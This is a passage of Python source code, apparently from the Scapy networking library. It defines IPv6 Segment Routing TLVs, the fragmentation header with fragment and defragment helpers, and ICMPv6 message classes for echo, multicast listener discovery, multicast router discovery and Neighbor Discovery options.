957class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
958    name = "IPv6 Option Header Segment Routing - Pad1 TLV"
959    # RFC8754 sect 2.1.1.1
960    fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs),
961                   FieldLenField("len", None, length_of="padding", fmt="B"),
962                   StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)]  # noqa: E501
963
964
965class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
966    name = "IPv6 Option Header Segment Routing - PadN TLV"
967    # RFC8754 sect 2.1.1.2
968    fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs),
969                   FieldLenField("len", None, length_of="padding", fmt="B"),
970                   StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)]  # noqa: E501
971
972
973class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
974    name = "IPv6 Option Header Segment Routing - HMAC TLV"
975    # RFC8754 sect 2.1.2
976    fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
977                   FieldLenField("len", None, length_of="hmac",
978                                 adjust=lambda _, x: x + 48),
979                   BitField("D", 0, 1),
980                   BitField("reserved", 0, 15),
981                   IntField("hmackeyid", 0),
982                   StrLenField("hmac", "",
983                               length_from=lambda pkt: pkt.len - 48)]
984
985
986class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
987    name = "IPv6 Option Header Segment Routing"
988    # RFC8754 sect 2. + flag bits from draft 06
989    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
990                   ByteField("len", None),
991                   ByteField("type", 4),
992                   ByteField("segleft", None),
993                   ByteField("lastentry", None),
994                   BitField("unused1", 0, 1),
995                   BitField("protected", 0, 1),
996                   BitField("oam", 0, 1),
997                   BitField("alert", 0, 1),
998                   BitField("hmac", 0, 1),
999                   BitField("unused2", 0, 3),
1000                   ShortField("tag", 0),
1001                   IP6ListField("addresses", ["::1"],
1002                                count_from=lambda pkt: (pkt.lastentry + 1)),
1003                   PacketListField("tlv_objects", [],
1004                                   IPv6ExtHdrSegmentRoutingTLV,
1005                                   length_from=lambda pkt: 8 * pkt.len - 16 * (
1006                                       pkt.lastentry + 1
1007                   ))]
1008
1009    overload_fields = {IPv6: {"nh": 43}}
1010
1011    def post_build(self, pkt, pay):
1012
1013        if self.len is None:
1014
1015            # The extension must be align on 8 bytes
1016            tmp_mod = (-len(pkt) + 8) % 8
1017            if tmp_mod == 1:
1018                tlv = IPv6ExtHdrSegmentRoutingTLVPad1()
1019                pkt += raw(tlv)
1020            elif tmp_mod >= 2:
1021                # Add the padding extension
1022                tmp_pad = b"\x00" * (tmp_mod - 2)
1023                tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad)
1024                pkt += raw(tlv)
1025
1026            tmp_len = (len(pkt) - 8) // 8
1027            pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:]
1028
1029        if self.segleft is None:
1030            tmp_len = len(self.addresses)
1031            if tmp_len:
1032                tmp_len -= 1
1033            pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]
1034
1035        if self.lastentry is None:
1036            lastentry = len(self.addresses)
1037            if lastentry == 0:
1038                warning(
1039                    "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
1040                )
1041            else:
1042                lastentry -= 1
1043            pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]
1044
1045        return _IPv6ExtHdr.post_build(self, pkt, pay)
1046
1047
1048#                           Fragmentation Header                             #
1049
1050class IPv6ExtHdrFragment(_IPv6ExtHdr):
1051    name = "IPv6 Extension Header - Fragmentation header"
1052    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
1053                   BitField("res1", 0, 8),
1054                   BitField("offset", 0, 13),
1055                   BitField("res2", 0, 2),
1056                   BitField("m", 0, 1),
1057                   IntField("id", None)]
1058    overload_fields = {IPv6: {"nh": 44}}
1059
1060    def guess_payload_class(self, p):
1061        if self.offset > 0:
1062            return Raw
1063        else:
1064            return super(IPv6ExtHdrFragment, self).guess_payload_class(p)
1065
1066
1067def defragment6(packets):
1068    """
1069    Performs defragmentation of a list of IPv6 packets. Packets are reordered.
1070    Crap is dropped. What lacks is completed by 'X' characters.
1071    """
1072
1073    # Remove non fragments
1074    lst = [x for x in packets if IPv6ExtHdrFragment in x]
1075    if not lst:
1076        return []
1077
1078    id = lst[0][IPv6ExtHdrFragment].id
1079
1080    llen = len(lst)
1081    lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id]
1082    if len(lst) != llen:
1083        warning("defragment6: some fragmented packets have been removed from list")  # noqa: E501
1084
1085    # reorder fragments
1086    res = []
1087    while lst:
1088        min_pos = 0
1089        min_offset = lst[0][IPv6ExtHdrFragment].offset
1090        for p in lst:
1091            cur_offset = p[IPv6ExtHdrFragment].offset
1092            if cur_offset < min_offset:
1093                min_pos = 0
1094                min_offset = cur_offset
1095        res.append(lst[min_pos])
1096        del(lst[min_pos])
1097
1098    # regenerate the fragmentable part
1099    fragmentable = b""
1100    for p in res:
1101        q = p[IPv6ExtHdrFragment]
1102        offset = 8 * q.offset
1103        if offset != len(fragmentable):
1104            warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))  # noqa: E501
1105        fragmentable += b"X" * (offset - len(fragmentable))
1106        fragmentable += raw(q.payload)
1107
1108    # Regenerate the unfragmentable part.
1109    q = res[0].copy()
1110    nh = q[IPv6ExtHdrFragment].nh
1111    q[IPv6ExtHdrFragment].underlayer.nh = nh
1112    q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
1113    del q[IPv6ExtHdrFragment].underlayer.payload
1114    q /= conf.raw_layer(load=fragmentable)
1115    del(q.plen)
1116
1117    if q[IPv6].underlayer:
1118        q[IPv6] = IPv6(raw(q[IPv6]))
1119    else:
1120        q = IPv6(raw(q))
1121    return q
1122
1123
1124def fragment6(pkt, fragSize):
1125    """
1126    Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
1127    expected maximum size of fragment data (MTU). The list of packets is
1128    returned.
1129
1130    If packet does not contain an IPv6ExtHdrFragment class, it is added to
1131    first IPv6 layer found. If no IPv6 layer exists packet is returned in
1132    result list unmodified.
1133    """
1134
1135    pkt = pkt.copy()
1136
1137    if IPv6ExtHdrFragment not in pkt:
1138        if IPv6 not in pkt:
1139            return [pkt]
1140
1141        layer3 = pkt[IPv6]
1142        data = layer3.payload
1143        frag = IPv6ExtHdrFragment(nh=layer3.nh)
1144
1145        layer3.remove_payload()
1146        del(layer3.nh)
1147        del(layer3.plen)
1148
1149        frag.add_payload(data)
1150        layer3.add_payload(frag)
1151
1152    # If the payload is bigger than 65535, a Jumbo payload must be used, as
1153    # an IPv6 packet can't be bigger than 65535 bytes.
1154    if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
1155        warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")  # noqa: E501
1156        return []
1157
1158    s = raw(pkt)  # for instantiation to get upper layer checksum right
1159
1160    if len(s) <= fragSize:
1161        return [pkt]
1162
1163    # Fragmentable part : fake IPv6 for Fragmentable part length computation
1164    fragPart = pkt[IPv6ExtHdrFragment].payload
1165    tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
1166    fragPartLen = len(tmp) - 40  # basic IPv6 header length
1167    fragPartStr = s[-fragPartLen:]
1168
1169    # Grab Next Header for use in Fragment Header
1170    nh = pkt[IPv6ExtHdrFragment].nh
1171
1172    # Keep fragment header
1173    fragHeader = pkt[IPv6ExtHdrFragment]
1174    del fragHeader.payload  # detach payload
1175
1176    # Unfragmentable Part
1177    unfragPartLen = len(s) - fragPartLen - 8
1178    unfragPart = pkt
1179    del pkt[IPv6ExtHdrFragment].underlayer.payload  # detach payload
1180
1181    # Cut the fragmentable part to fit fragSize. Inner fragments have
1182    # a length that is an integer multiple of 8 octets. last Frag MTU
1183    # can be anything below MTU
1184    lastFragSize = fragSize - unfragPartLen - 8
1185    innerFragSize = lastFragSize - (lastFragSize % 8)
1186
1187    if lastFragSize <= 0 or innerFragSize == 0:
1188        warning("Provided fragment size value is too low. " +
1189                "Should be more than %d" % (unfragPartLen + 8))
1190        return [unfragPart / fragHeader / fragPart]
1191
1192    remain = fragPartStr
1193    res = []
1194    fragOffset = 0     # offset, incremeted during creation
1195    fragId = random.randint(0, 0xffffffff)  # random id ...
1196    if fragHeader.id is not None:  # ... except id provided by user
1197        fragId = fragHeader.id
1198    fragHeader.m = 1
1199    fragHeader.id = fragId
1200    fragHeader.nh = nh
1201
1202    # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
1203    while True:
1204        if (len(remain) > lastFragSize):
1205            tmp = remain[:innerFragSize]
1206            remain = remain[innerFragSize:]
1207            fragHeader.offset = fragOffset    # update offset
1208            fragOffset += (innerFragSize // 8)  # compute new one
1209            if IPv6 in unfragPart:
1210                unfragPart[IPv6].plen = None
1211            tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
1212            res.append(tempo)
1213        else:
1214            fragHeader.offset = fragOffset    # update offSet
1215            fragHeader.m = 0
1216            if IPv6 in unfragPart:
1217                unfragPart[IPv6].plen = None
1218            tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
1219            res.append(tempo)
1220            break
1221    return res
1222
1223
1224#############################################################################
1225#############################################################################
1226#                             ICMPv6* Classes                               #
1227#############################################################################
1228#############################################################################
1229
1230
1231icmp6typescls = {1: "ICMPv6DestUnreach",
1232                 2: "ICMPv6PacketTooBig",
1233                 3: "ICMPv6TimeExceeded",
1234                 4: "ICMPv6ParamProblem",
1235                 128: "ICMPv6EchoRequest",
1236                 129: "ICMPv6EchoReply",
1237                 130: "ICMPv6MLQuery",  # MLDv1 or MLDv2
1238                 131: "ICMPv6MLReport",
1239                 132: "ICMPv6MLDone",
1240                 133: "ICMPv6ND_RS",
1241                 134: "ICMPv6ND_RA",
1242                 135: "ICMPv6ND_NS",
1243                 136: "ICMPv6ND_NA",
1244                 137: "ICMPv6ND_Redirect",
1245                 # 138: Do Me - RFC 2894 - Seems painful
1246                 139: "ICMPv6NIQuery",
1247                 140: "ICMPv6NIReply",
1248                 141: "ICMPv6ND_INDSol",
1249                 142: "ICMPv6ND_INDAdv",
1250                 143: "ICMPv6MLReport2",
1251                 144: "ICMPv6HAADRequest",
1252                 145: "ICMPv6HAADReply",
1253                 146: "ICMPv6MPSol",
1254                 147: "ICMPv6MPAdv",
1255                 # 148: Do Me - SEND related - RFC 3971
1256                 # 149: Do Me - SEND related - RFC 3971
1257                 151: "ICMPv6MRD_Advertisement",
1258                 152: "ICMPv6MRD_Solicitation",
1259                 153: "ICMPv6MRD_Termination",
1260                 # 154: Do Me - FMIPv6 Messages - RFC 5568
1261                 155: "ICMPv6RPL",  # RFC 6550
1262                 }
1263
1264icmp6typesminhdrlen = {1: 8,
1265                       2: 8,
1266                       3: 8,
1267                       4: 8,
1268                       128: 8,
1269                       129: 8,
1270                       130: 24,
1271                       131: 24,
1272                       132: 24,
1273                       133: 8,
1274                       134: 16,
1275                       135: 24,
1276                       136: 24,
1277                       137: 40,
1278                       # 139:
1279                       # 140
1280                       141: 8,
1281                       142: 8,
1282                       143: 8,
1283                       144: 8,
1284                       145: 8,
1285                       146: 8,
1286                       147: 8,
1287                       151: 8,
1288                       152: 4,
1289                       153: 4,
1290                       155: 4
1291                       }
1292
1293icmp6types = {1: "Destination unreachable",
1294              2: "Packet too big",
1295              3: "Time exceeded",
1296              4: "Parameter problem",
1297              100: "Private Experimentation",
1298              101: "Private Experimentation",
1299              128: "Echo Request",
1300              129: "Echo Reply",
1301              130: "MLD Query",
1302              131: "MLD Report",
1303              132: "MLD Done",
1304              133: "Router Solicitation",
1305              134: "Router Advertisement",
1306              135: "Neighbor Solicitation",
1307              136: "Neighbor Advertisement",
1308              137: "Redirect Message",
1309              138: "Router Renumbering",
1310              139: "ICMP Node Information Query",
1311              140: "ICMP Node Information Response",
1312              141: "Inverse Neighbor Discovery Solicitation Message",
1313              142: "Inverse Neighbor Discovery Advertisement Message",
1314              143: "MLD Report Version 2",
1315              144: "Home Agent Address Discovery Request Message",
1316              145: "Home Agent Address Discovery Reply Message",
1317              146: "Mobile Prefix Solicitation",
1318              147: "Mobile Prefix Advertisement",
1319              148: "Certification Path Solicitation",
1320              149: "Certification Path Advertisement",
1321              151: "Multicast Router Advertisement",
1322              152: "Multicast Router Solicitation",
1323              153: "Multicast Router Termination",
1324              155: "RPL Control Message",
1325              200: "Private Experimentation",
1326              201: "Private Experimentation"}
1327
1328
1329class _ICMPv6(Packet):
1330    name = "ICMPv6 dummy class"
1331    overload_fields = {IPv6: {"nh": 58}}
1332
1333    def post_build(self, p, pay):
1334        p += pay
1335        if self.cksum is None:
1336            chksum = in6_chksum(58, self.underlayer, p)
1337            p = p[:2] + struct.pack("!H", chksum) + p[4:]
1338        return p
1339
1340    def hashret(self):
1341        return self.payload.hashret()
1342
1343    def answers(self, other):
1344        # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
1345        if (isinstance(self.underlayer, IPerror6) or
1346            isinstance(self.underlayer, _IPv6ExtHdr) and
1347                isinstance(other, _ICMPv6)):
1348            if not ((self.type == other.type) and
1349                    (self.code == other.code)):
1350                return 0
1351            return 1
1352        return 0
1353
1354
1355class _ICMPv6Error(_ICMPv6):
1356    name = "ICMPv6 errors dummy class"
1357
1358    def guess_payload_class(self, p):
1359        return IPerror6
1360
1361
1362class ICMPv6Unknown(_ICMPv6):
1363    name = "Scapy6 ICMPv6 fallback class"
1364    fields_desc = [ByteEnumField("type", 1, icmp6types),
1365                   ByteField("code", 0),
1366                   XShortField("cksum", None),
1367                   StrField("msgbody", "")]
1368
1369
1370#                                  RFC 2460                                  #
1371
1372class ICMPv6DestUnreach(_ICMPv6Error):
1373    name = "ICMPv6 Destination Unreachable"
1374    fields_desc = [ByteEnumField("type", 1, icmp6types),
1375                   ByteEnumField("code", 0, {0: "No route to destination",
1376                                             1: "Communication with destination administratively prohibited",  # noqa: E501
1377                                             2: "Beyond scope of source address",  # noqa: E501
1378                                             3: "Address unreachable",
1379                                             4: "Port unreachable"}),
1380                   XShortField("cksum", None),
1381                   ByteField("length", 0),
1382                   X3BytesField("unused", 0)]
1383
1384
1385class ICMPv6PacketTooBig(_ICMPv6Error):
1386    name = "ICMPv6 Packet Too Big"
1387    fields_desc = [ByteEnumField("type", 2, icmp6types),
1388                   ByteField("code", 0),
1389                   XShortField("cksum", None),
1390                   IntField("mtu", 1280)]
1391
1392
1393class ICMPv6TimeExceeded(_ICMPv6Error):
1394    name = "ICMPv6 Time Exceeded"
1395    fields_desc = [ByteEnumField("type", 3, icmp6types),
1396                   ByteEnumField("code", 0, {0: "hop limit exceeded in transit",  # noqa: E501
1397                                             1: "fragment reassembly time exceeded"}),  # noqa: E501
1398                   XShortField("cksum", None),
1399                   ByteField("length", 0),
1400                   X3BytesField("unused", 0)]
1401
1402# The default pointer value is set to the next header field of
1403# the encapsulated IPv6 packet
1404
1405
1406class ICMPv6ParamProblem(_ICMPv6Error):
1407    name = "ICMPv6 Parameter Problem"
1408    fields_desc = [ByteEnumField("type", 4, icmp6types),
1409                   ByteEnumField(
1410                       "code", 0,
1411                       {0: "erroneous header field encountered",
1412                        1: "unrecognized Next Header type encountered",
1413                        2: "unrecognized IPv6 option encountered",
1414                        3: "first fragment has incomplete header chain"}),
1415                   XShortField("cksum", None),
1416                   IntField("ptr", 6)]
1417
1418
1419class ICMPv6EchoRequest(_ICMPv6):
1420    name = "ICMPv6 Echo Request"
1421    fields_desc = [ByteEnumField("type", 128, icmp6types),
1422                   ByteField("code", 0),
1423                   XShortField("cksum", None),
1424                   XShortField("id", 0),
1425                   XShortField("seq", 0),
1426                   StrField("data", "")]
1427
1428    def mysummary(self):
1429        return self.sprintf("%name% (id: %id% seq: %seq%)")
1430
1431    def hashret(self):
1432        return struct.pack("HH", self.id, self.seq) + self.payload.hashret()
1433
1434
1435class ICMPv6EchoReply(ICMPv6EchoRequest):
1436    name = "ICMPv6 Echo Reply"
1437    type = 129
1438
1439    def answers(self, other):
1440        # We could match data content between request and reply.
1441        return (isinstance(other, ICMPv6EchoRequest) and
1442                self.id == other.id and self.seq == other.seq and
1443                self.data == other.data)
1444
1445
1446#            ICMPv6 Multicast Listener Discovery (RFC2710)                  #
1447
1448# tous les messages MLD sont emis avec une adresse source lien-locale
1449# -> Y veiller dans le post_build si aucune n'est specifiee
1450# La valeur de Hop-Limit doit etre de 1
1451# "and an IPv6 Router Alert option in a Hop-by-Hop Options
1452# header. (The router alert option is necessary to cause routers to
1453# examine MLD messages sent to multicast addresses in which the router
1454# itself has no interest"
1455class _ICMPv6ML(_ICMPv6):
1456    fields_desc = [ByteEnumField("type", 130, icmp6types),
1457                   ByteField("code", 0),
1458                   XShortField("cksum", None),
1459                   ShortField("mrd", 0),
1460                   ShortField("reserved", 0),
1461                   IP6Field("mladdr", "::")]
1462
1463# general queries are sent to the link-scope all-nodes multicast
1464# address ff02::1, with a multicast address field of 0 and a MRD of
1465# [Query Response Interval]
1466# Default value for mladdr is set to 0 for a General Query, and
1467# overloaded by the user for a Multicast Address specific query
1468# TODO : See what we can do to automatically include a Router Alert
1469#        Option in a Destination Option Header.
1470
1471
1472class ICMPv6MLQuery(_ICMPv6ML):  # RFC 2710
1473    name = "MLD - Multicast Listener Query"
1474    type = 130
1475    mrd = 10000  # 10s for mrd
1476    mladdr = "::"
1477    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1478
1479
1480# TODO : See what we can do to automatically include a Router Alert
1481#        Option in a Destination Option Header.
1482class ICMPv6MLReport(_ICMPv6ML):  # RFC 2710
1483    name = "MLD - Multicast Listener Report"
1484    type = 131
1485    overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
1486
1487    def answers(self, query):
1488        """Check the query type"""
1489        return ICMPv6MLQuery in query
1490
1491# When a node ceases to listen to a multicast address on an interface,
1492# it SHOULD send a single Done message to the link-scope all-routers
1493# multicast address (FF02::2), carrying in its multicast address field
1494# the address to which it is ceasing to listen
1495# TODO : See what we can do to automatically include a Router Alert
1496#        Option in a Destination Option Header.
1497
1498
1499class ICMPv6MLDone(_ICMPv6ML):  # RFC 2710
1500    name = "MLD - Multicast Listener Done"
1501    type = 132
1502    overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}
1503
1504
1505#            Multicast Listener Discovery Version 2 (MLDv2) (RFC3810)       #
1506
1507class ICMPv6MLQuery2(_ICMPv6):  # RFC 3810
1508    name = "MLDv2 - Multicast Listener Query"
1509    fields_desc = [ByteEnumField("type", 130, icmp6types),
1510                   ByteField("code", 0),
1511                   XShortField("cksum", None),
1512                   ShortField("mrd", 10000),
1513                   ShortField("reserved", 0),
1514                   IP6Field("mladdr", "::"),
1515                   BitField("Resv", 0, 4),
1516                   BitField("S", 0, 1),
1517                   BitField("QRV", 0, 3),
1518                   ByteField("QQIC", 0),
1519                   ShortField("sources_number", None),
1520                   IP6ListField("sources", [],
1521                                count_from=lambda pkt: pkt.sources_number)]
1522
1523    # RFC8810 - 4. Message Formats
1524    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1525
1526    def post_build(self, packet, payload):
1527        """Compute the 'sources_number' field when needed"""
1528        if self.sources_number is None:
1529            srcnum = struct.pack("!H", len(self.sources))
1530            packet = packet[:26] + srcnum + packet[28:]
1531        return _ICMPv6.post_build(self, packet, payload)
1532
1533
1534class ICMPv6MLDMultAddrRec(Packet):
1535    name = "ICMPv6 MLDv2 - Multicast Address Record"
1536    fields_desc = [ByteField("rtype", 4),
1537                   FieldLenField("auxdata_len", None,
1538                                 length_of="auxdata",
1539                                 fmt="B"),
1540                   FieldLenField("sources_number", None,
1541                                 length_of="sources",
1542                                 adjust=lambda p, num: num // 16),
1543                   IP6Field("dst", "::"),
1544                   IP6ListField("sources", [],
1545                                length_from=lambda p: 16 * p.sources_number),
1546                   StrLenField("auxdata", "",
1547                               length_from=lambda p: p.auxdata_len)]
1548
1549    def default_payload_class(self, packet):
1550        """Multicast Address Record followed by another one"""
1551        return self.__class__
1552
1553
1554class ICMPv6MLReport2(_ICMPv6):  # RFC 3810
1555    name = "MLDv2 - Multicast Listener Report"
1556    fields_desc = [ByteEnumField("type", 143, icmp6types),
1557                   ByteField("res", 0),
1558                   XShortField("cksum", None),
1559                   ShortField("reserved", 0),
1560                   ShortField("records_number", None),
1561                   PacketListField("records", [],
1562                                   ICMPv6MLDMultAddrRec,
1563                                   count_from=lambda p: p.records_number)]
1564
1565    # RFC8810 - 4. Message Formats
1566    overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}}
1567
1568    def post_build(self, packet, payload):
1569        """Compute the 'records_number' field when needed"""
1570        if self.records_number is None:
1571            recnum = struct.pack("!H", len(self.records))
1572            packet = packet[:6] + recnum + packet[8:]
1573        return _ICMPv6.post_build(self, packet, payload)
1574
1575    def answers(self, query):
1576        """Check the query type"""
1577        return isinstance(query, ICMPv6MLQuery2)
1578
1579
1580#          ICMPv6 MRD - Multicast Router Discovery (RFC 4286)               #
1581
1582# TODO:
1583# - 04/09/06 troglocan : find a way to automatically add a router alert
1584#            option for all MRD packets. This could be done in a specific
1585#            way when IPv6 is the under layer with some specific keyword
1586#            like 'exthdr'. This would allow to keep compatibility with
1587#            providing IPv6 fields to be overloaded in fields_desc.
1588#
1589#            At the moment, if user inserts an IPv6 Router alert option
1590#            none of the IPv6 default values of IPv6 layer will be set.
1591
1592class ICMPv6MRD_Advertisement(_ICMPv6):
1593    name = "ICMPv6 Multicast Router Discovery Advertisement"
1594    fields_desc = [ByteEnumField("type", 151, icmp6types),
1595                   ByteField("advinter", 20),
1596                   XShortField("cksum", None),
1597                   ShortField("queryint", 0),
1598                   ShortField("robustness", 0)]
1599    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1600    # IPv6 Router Alert requires manual inclusion
1601
1602    def extract_padding(self, s):
1603        return s[:8], s[8:]
1604
1605
1606class ICMPv6MRD_Solicitation(_ICMPv6):
1607    name = "ICMPv6 Multicast Router Discovery Solicitation"
1608    fields_desc = [ByteEnumField("type", 152, icmp6types),
1609                   ByteField("res", 0),
1610                   XShortField("cksum", None)]
1611    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1612    # IPv6 Router Alert requires manual inclusion
1613
1614    def extract_padding(self, s):
1615        return s[:4], s[4:]
1616
1617
1618class ICMPv6MRD_Termination(_ICMPv6):
1619    name = "ICMPv6 Multicast Router Discovery Termination"
1620    fields_desc = [ByteEnumField("type", 153, icmp6types),
1621                   ByteField("res", 0),
1622                   XShortField("cksum", None)]
1623    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}
1624    # IPv6 Router Alert requires manual inclusion
1625
1626    def extract_padding(self, s):
1627        return s[:4], s[4:]
1628
1629
1630#                   ICMPv6 Neighbor Discovery (RFC 2461)                    #
1631
1632icmp6ndopts = {1: "Source Link-Layer Address",
1633               2: "Target Link-Layer Address",
1634               3: "Prefix Information",
1635               4: "Redirected Header",
1636               5: "MTU",
1637               6: "NBMA Shortcut Limit Option",  # RFC2491
1638               7: "Advertisement Interval Option",
1639               8: "Home Agent Information Option",
1640               9: "Source Address List",
1641               10: "Target Address List",
1642               11: "CGA Option",            # RFC 3971
1643               12: "RSA Signature Option",  # RFC 3971
1644               13: "Timestamp Option",      # RFC 3971
1645               14: "Nonce option",          # RFC 3971
1646               15: "Trust Anchor Option",   # RFC 3971
1647               16: "Certificate Option",    # RFC 3971
1648               17: "IP Address Option",                             # RFC 4068
1649               18: "New Router Prefix Information Option",          # RFC 4068
1650               19: "Link-layer Address Option",                     # RFC 4068
1651               20: "Neighbor Advertisement Acknowledgement Option",
1652               21: "CARD Request Option",  # RFC 4065/4066/4067
1653               22: "CARD Reply Option",   # RFC 4065/4066/4067
1654               23: "MAP Option",          # RFC 4140
1655               24: "Route Information Option",  # RFC 4191
1656               25: "Recursive DNS Server Option",
1657               26: "IPv6 Router Advertisement Flags Option"
1658               }
1659
1660icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr",
1661                  2: "ICMPv6NDOptDstLLAddr",
1662                  3: "ICMPv6NDOptPrefixInfo",
1663                  4: "ICMPv6NDOptRedirectedHdr",
1664                  5: "ICMPv6NDOptMTU",
1665                  6: "ICMPv6NDOptShortcutLimit",
1666                  7: "ICMPv6NDOptAdvInterval",
1667                  8: "ICMPv6NDOptHAInfo",
1668                  9: "ICMPv6NDOptSrcAddrList",
1669                  10: "ICMPv6NDOptTgtAddrList",
1670                  # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
1671                  # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
1672                  # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
1673                  # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
1674                  # 15: Do Me,
1675                  # 16: Do Me,
1676                  17: "ICMPv6NDOptIPAddr",
1677                  18: "ICMPv6NDOptNewRtrPrefix",
1678                  19: "ICMPv6NDOptLLA",
1679                  # 18: Do Me,
1680                  # 19: Do Me,
1681                  # 20: Do Me,
1682                  # 21: Do Me,
1683                  # 22: Do Me,
1684                  23: "ICMPv6NDOptMAP",
1685                  24: "ICMPv6NDOptRouteInfo",
1686                  25: "ICMPv6NDOptRDNSS",
1687                  26: "ICMPv6NDOptEFA",
1688                  31: "ICMPv6NDOptDNSSL"
1689                  }
1690
1691icmp6ndraprefs = {0: "Medium (default)",
1692                  1: "High",
1693                  2: "Reserved",
1694                  3: "Low"}  # RFC 4191
1695
1696
1697class _ICMPv6NDGuessPayload:
1698    name = "Dummy ND class that implements guess_payload_class()"
1699
1700    def guess_payload_class(self, p):
1701        if len(p) > 1:
1702            return icmp6ndoptscls.get(orb(p[0]), Raw)  # s/Raw/ICMPv6NDOptUnknown/g ?  # noqa: E501
1703
1704
1705# Beginning of ICMPv6 Neighbor Discovery Options.
1706
1707class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
1708    name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
1709    fields_desc = [ByteField("type", None),
1710                   FieldLenField("len", None, length_of="data", fmt="B",
1711                                 adjust=lambda pkt, x: x + 2),
1712                   StrLenField("data", "",
1713                               length_from=lambda pkt: pkt.len - 2)]
1714
1715# NOTE: len includes type and len field. Expressed in unit of 8 bytes
1716# TODO: Revoir le coup du ETHER_ANY
1717
1718
1719class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
1720    name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
1721    fields_desc = [ByteField("type", 1),
1722                   ByteField("len", 1),
1723                   MACField("lladdr", ETHER_ANY)]
1724
1725    def mysummary(self):
1726        return self.sprintf("%name% %lladdr%")
1727
1728
1729class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
1730    name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
1731    type = 2
1732
1733
1734class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
1735    name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
1736    fields_desc = [ByteField("type", 3),
1737                   ByteField("len", 4),
1738                   ByteField("prefixlen", 64),
1739                   BitField("L", 1, 1),
1740                   BitField("A", 1, 1),
1741                   BitField("R", 0, 1),
1742                   BitField("res1", 0, 5),
1743                   XIntField("validlifetime", 0xffffffff),
1744                   XIntField("preferredlifetime", 0xffffffff),
1745                   XIntField("res2", 0x00000000),
1746                   IP6Field("prefix", "::")]
1747
1748    def mysummary(self):
1749        return self.sprintf("%name% %prefix%/%prefixlen% "
1750                            "On-link %L% Autonomous Address %A% "
1751                            "Router Address %R%")
1752
1753# TODO: We should also limit the size of included packet to something
1754# like (initiallen - 40 - 2)
1755
1756
1757class TruncPktLenField(PacketLenField):
1758    __slots__ = ["cur_shift"]
1759
1760    def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):  # noqa: E501
1761        PacketLenField.__init__(self, name, default, cls, length_from=length_from)  # noqa: E501
1762        self.cur_shift = cur_shift
1763
1764    def getfield(self, pkt, s):
1765        tmp_len = self.length_from(pkt)
1766        i = self.m2i(pkt, s[:tmp_len])
1767        return s[tmp_len:], i
1768
1769    def m2i(self, pkt, m):
1770        s = None
1771        try:  # It can happen we have sth shorter than 40 bytes
1772            s = self.cls(m)
1773        except Exception:
1774            return conf.raw_layer(m)
1775        return s
1776
1777    def i2m(self, pkt, x):
1778        s = raw(x)
1779        tmp_len = len(s)
1780        r = (tmp_len + self.cur_shift) % 8
1781        tmp_len = tmp_len - r
1782        return s[:tmp_len]
1783
1784    def i2len(self, pkt, i):
1785        return len(self.i2m(pkt, i))
1786
1787
1788# Faire un post_build pour le recalcul de la taille (en multiple de 8 octets)
1789class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
1790    name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
1791    fields_desc = [ByteField("type", 4),
1792                   FieldLenField("len", None, length_of="pkt", fmt="B",
1793                                 adjust=lambda pkt, x:(x + 8) // 8),
1794                   StrFixedLenField("res", b"\x00" * 6, 6),
1795                   TruncPktLenField("pkt", b"", IPv6, 8,
1796                                    length_from=lambda pkt: 8 * pkt.len - 8)]
1797
1798# See which value should be used for default MTU instead of 1280
1799
1800
1801class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
1802    name = "ICMPv6 Neighbor Discovery Option - MTU"
